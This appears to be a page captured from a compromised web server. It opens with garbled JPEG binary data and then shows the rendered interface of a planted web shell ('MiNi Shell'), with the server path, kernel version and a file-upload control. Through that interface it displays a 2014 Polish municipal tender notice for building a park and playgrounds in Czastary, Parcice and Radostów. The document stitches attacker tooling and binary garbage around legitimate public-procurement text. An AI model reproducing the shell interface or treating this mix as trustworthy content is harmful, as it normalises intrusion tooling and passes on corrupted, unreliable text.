JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140203/37722-N-2014.html

<p class="kh_header"><b>Czastary: Zadanie nr 1.  Park w Czastarach -miejsce rekreacji , wypoczynku i   
                             i zabawy

	  Zadanie nr 2.  Plac zabaw w  Parcicach
	
	  Zadanie nr 3.  Plac zabaw w Radostowie</b><br>
<b>Numer ogłoszenia: 37722 - 2014; data zamieszczenia: 03.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czastary , ul. Wolności 29, 98-410 Czastary, woj. łódzkie, tel. 062 7843111, faks 062 7843191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czastary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1.  Park w Czastarach -miejsce rekreacji , wypoczynku i   
                             i zabawy

	  Zadanie nr 2.  Plac zabaw w  Parcicach
	
	  Zadanie nr 3.  Plac zabaw w Radostowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa miejsca rekreacji,wypoczynku i zabawy  w m. Czastary, budowa palcu zabaw w miejscowości Parcice i budowa placu zabaw w miejscowości Radostów.

1.Park w Czastarach- miejsce rekreacji,wypoczynku i zabawy
		                            

Opis ogólny.

Działka, zlokalizowana w miejscowości Czastary, na której projektuje się miejsce rekreacji , wypoczynku i zabaw  jest w użyczeniu przez Gminę Czastary od OSP w Czastarach na okres 10 lat zgodnie z umową użyczenia nr 2/2013 z dnia 14.01.2013 r. Plac obecnie wykorzystywany jest jako park  na terenie którym znajdują się elementy małej architektury , częściowe ogrodzenie oraz zbiornik p.poż..Teren w całości pokryty nawierzchnia trawiastą z chodnikami z płytek betonowych. Na terenie działki występują liczne nasadzenia starodrzewiem parkowym . Powierzchnia projektowana  pod inwestycję  wynosi  4490.72 m2. Nr ewidencyjny działki 1568/1

Projekt zagospodarowania placu.

Zakres robót:

1.   Roboty ziemne / korytowanie terenu na głębokość 30 cm na pow. ok.430 m2 pod utworzenie nawierzchni piaskowej , korytowanie terenu  na głębokość 20 cm  pod chodnik o pow . 7 4 m 2  , korytowanie terenu pod  kiosk na głębokość 27 cm i pow. 25 m2 plantowanie.

2.   Roboty budowlane i demontażowe / demontaż istniejących ławek ze stopami fundamentowymi, demontaż koszy, rozbiórka istniejącego chodnika , rozbiórka istniejącego budynku gospodarczego,  rozbiórka istniejącego ogrodzenia z siatki stalowej na słupkach betonowych i stalowych,  utworzenie nawierzchni bezpiecznej z piasku rzecznego , wybudowanie chodników z obrzeżami betonowymi , ogrodzenie terenu oraz ogrodzenie zbiornika p.poż . ogrodzeniem systemowym z siatki metalowej powlekanej .

3.   Plantowanie terenu

4.  Nasadzenia żywopłotu, nasadzenia krzewów,wycięcie 3 drzew.

3.   Wyznaczenie miejsca pod urządzenia placu zabaw.

4.   Montaż urządzeń.

Projektowane urządzenia na placu rekreacji, wypoczynku i zabawy .

1.   Zestaw zabawowy duży 1 kpl..
2.  Zestaw zabawowy mały 1 kpl.

3.  Piramida linowa 1 szt..

4.   Sześcian wspinaczkowy 1 szt.

5.   Huśtawka wahadłowa  typu bocianie gniazdo 1 szt.

6.   Huśtawka wahadłowa podwójna 1 szt.z siedziskami gumowymi

7.   Huśtawka wahadłowa  podwójna  1 szt. z siedziskami koszykowymi

8.   Tuba na sprężynach 1 szt.

9.   Koniczynka na sprężynach 1 szt.

10. Slalom 2 szt.

11.Równoważnia na podporach 2 szt.

12.Huśtawka wagowa 2 szt.

13.Ławki 10 szt

14.Kosz na śmieci 5 szt.

15.Regulamin placu zabaw  1 szt.

16.Betonowe stoliki do gier planszowych z 4 siedziskami  szt 2.


Szczegółowy zakres robót został określony w książce przedmiarów

UWAGA: wszystkie urządzenia zamontowane na placu zabaw muszą posiadać świadectwa  zgodności  z  wymogami  tego  typu  urządzeń  i  właściwe  oznakowania. Inwestor może zażądać od Wykonawcy przedstawienia dokumentów przed ich zamontowaniem. Nie wolno montować urządzeń bez dopuszczenia ich do użytku dla dzieci jako wyposażenie placów zabaw.



Na załączniku graficznym, rysunek zagospodarowania terenu, wyznaczono miejsce lokalizacji urządzeń i oznaczono strefy bezpieczeństwa. Strefy te muszą by bezwzględnie zachowane. Urządzenia należy montować zgodnie z instrukcją montażu, która musi by załączona do wyposażenia, a opracowana przez producenta. Urządzenia muszą być tak zabudowane, aby nie stanowiły zagrożenia dla ich użytkowników i osób przebywających w ich sąsiedztwie.
Po   zabudowie   urządzeń   w   widocznym   miejscu   należy   umieścić   instrukcje bezpiecznego ich użytkowania.



2.  Plac zabaw w Parciach

Opis ogólny.

Działka, zlokalizowana w miejscowości Parcice, na której projektuje się plac zabaw jest własnością Gminy Czastary. Teren na którym projektuje się wykonanie placu zabaw w całości pokryty nawierzchnią trawiastą   bez   znacznych   różnic   wysokości.   Powierzchnia projektowana pod plac zabaw wynosi 262.77 m2. Nr ewidencyjny działki 769.


Projekt zagospodarowania placu.

Zakres robót:

1.   Roboty ziemne / korytowanie terenu na głębokość 30 cm na pow. około 21m2 .

2.   Roboty budowlane /utworzenie nawierzchni bezpiecznej  z piasku rzecznego,, karczowanie fragmentów żywopłotu , ogrodzenie terenu placu zabaw ogrodzeniem  systemowym z siatki zgrzewanej.

3.   Wyznaczenie miejsca pod urządzenia placu zabaw.

4.    Montaż urządzeń.



Projektowane urządzenia na placu zabaw:

1.   Zestaw zabawowy o wymiarach  3.7 x 2.15 m o wysokości swobodnego upadku  95 cm     1 kpt.

2.   Huśtawka wahadłowa z siedziskami /deseczka i koszyk/szt.1

3.   Huśtawka wagowa szt.1.

4.   Piramida linowa. szt. 1

5.   Piaskownica szt. 1

6.   Ławka z oparciem szt. 2.

7.   Kosz na śmieci szt 1.
8.   Regulamin placu zabaw.szt. 1.

8.   Ogrodzenie 66 mb.

Szczegółowy zakres robót został określony w książce przedmiarów


UWAGA: wszystkie urządzenia zamontowane na placu zabaw muszą posiadać świadectwa  zgodności  z  wymogami  tego  typu  urządzeń  i  właściwe  oznakowania. Inwestor może zażądać od Wykonawcy przedstawienia dokumentów przed ich zamontowaniem. Nie wolno montować urządzeń bez dopuszczenia ich do użytku dla dzieci jako wyposażenie placów zabaw.
Na załączniku graficznym, rysunek zagospodarowania terenu, wyznaczono miejsce

lokalizacji urządzeń i oznaczono strefy bezpieczeństwa. Strefy te muszą by bezwzględnie zachowane. Urządzenia należy montować zgodnie z instrukcją montażu, która musi by załączona do wyposażenia, a opracowana przez producenta. Urządzenia muszą być tak zabudowane, aby nie stanowiły zagrożenia dla ich użytkowników i osób przebywających w ich sąsiedztwie.
Po   zabudowie   urządzeń   w   widocznym   miejscu   należy   umieścić   instrukcje bezpiecznego ich użytkowania.

3.  Plac zabaw  w Radostowie.


Opis ogólny.

Działka, zlokalizowana w miejscowości  Radostów Pierwszy, na której projektuje się plac zabaw jest własnością  Gminy Czastary. Obecnie na placu znajduje się plac zabaw oddziału przedszkolnego .Plac jest częściowo porośnięty trawą oddzielnym z klombem i ogródkiem warzywnym. Plac ogrodzony ogrodzeniem w złym stanie technicznym, a teren na którym jest projektowany plac zabaw jest  równy bez znacznych różnic wysokości. Powierzchnia projektowana pod plac zabaw wynosi  500.1  m2. Nr ewidencyjny działki 229/4


Projekt zagospodarowania placu.

Zakres robót:

1.   Roboty ziemne /korytowanie terenu na głębokość 30 cm na pow. ok.52 m2

2.   Roboty budowlane /utworzenie nawierzchni bezpiecznej  z pisaku rzecznego  o warstwie grubości 30 cm., rozbiórka istniejącego ogrodzenia i wykonanie nowego systemowego z siatki zgrzewanej powlekanej

3.   Wyznaczenie miejsca pod urządzenia placu zabaw.

4.   Montaż urządzeń.



Projektowane urządzenia na placu zabaw.

1.   Zestaw zabawowy o wymiarach  3.7 x 2.15 m o wysokości swobodnego upadku  95 cm     1 kpt.

2.   Huśtawka wahadłowa z siedziskami /deseczka i koszyk/szt.1

3.   Huśtawka wagowa szt.1.

4.   Sześcian wspinaczkowy szt. 1

5.   Domek wolnostojący szt. 1

6.   Bujak na sprężynie szt.1.

7.   Piaskownica okrągła szt 1.
8.  Ławka  z oparciem szt 2.
9.  Kosz na śmieci szt 1.
10. Regulamin placu zabaw szt 1.

Szczegółowy zakres robót został określony w książce przedmiarów


UWAGA: wszystkie urządzenia zamontowane na placu zabaw muszą posiadać świadectwa  zgodności  z  wymogami  tego  typu  urządzeń  i  właściwe  oznakowania. Inwestor może zażądać od Wykonawcy przedstawienia dokumentów przed ich zamontowaniem. Nie wolno montować urządzeń bez dopuszczenia ich do użytku dla dzieci jako wyposażenie placów zabaw.
Na załączniku graficznym, rysunek zagospodarowania terenu, wyznaczono miejsce lokalizacji urządzeń i oznaczono strefy bezpieczeństwa. Strefy te muszą by bezwzględnie zachowane. Urządzenia należy montować zgodnie z instrukcją montażu, która musi by załączona  do  wyposażenia,  a  opracowana  przez  producenta.  Urządzenia  muszą  być  tak zabudowane, aby nie stanowiły zagrożenia dla ich użytkowników i osób przebywających w ich sąsiedztwie.
Po   zabudowie   urządzeń   w   widocznym   miejscu   należy   umieścić   instrukcje

bezpiecznego ich użytkowania..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza w okresie 3 lat od podpisania umowy, udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, polegających na wykonania robót budowlanych, które mogą okazać się konieczne z powodu ewentualnych korekt projektu na etapie wykonawstwa do wysokości 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.30.00-9, 45.11.27.23-9, 45.22.38.00-4, 45.11.27.10-5, 45.11.12.13-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Niewymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli załączy do oferty aktualny odpis właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert a w stosunku do osób  fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że Wykonawca spełnia warunek jeżeli do oferty Wykonawca załączy:


1) Wykaz   wykonanych   w   okresie   ostatnich   pięciu   lat   przed   dniem   wszczęcia postępowania o  udzielenie zamówienia,  a jeżeli  okres  działalności jest  krótszy - w tym okresie, co najmniej 3 robót budowlanych o wartości minimum 35 000 zł brutto każda,   odpowiadających swoim rodzajem przedmiotowi zamówienia, wraz z podaniem ich daty, miejsca wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje - dokumenty muszą dotyczyć pozycji ujętych w załączniku nr 5),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że Wykonawca spełnia warunek jeżeli załączy do oferty oświadczenie,  że  osoby,  które  będą  uczestniczyć  w  wykonywaniu  zamówienia posiadają wymagane uprawnienia, jeśli przepisy nakładają obowiązek posiadania takich uprawnień .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy aby posiadał:

1) opłaconą polisę  lub  inny  dokument  potwierdzający,  że  wykonawca  (w  przypadku wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  przynajmniej jeden z nich) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000,00 zł. Dokument taki winien być aktualny na dzień składania ofert. Do polisy należy dołączyć dowód opłacania składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie wymaga się.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czastary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czastary

ul. Wolności 29

98-410 Czastary
pok. 12  w godz. pracy urzędu tj. od 7.30 do 15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2014 godzina 10:00, miejsce: Urząd Gminy Czastary

ul. Wolności 29

98-410 Czastary
pok. 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane z programu PROW 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com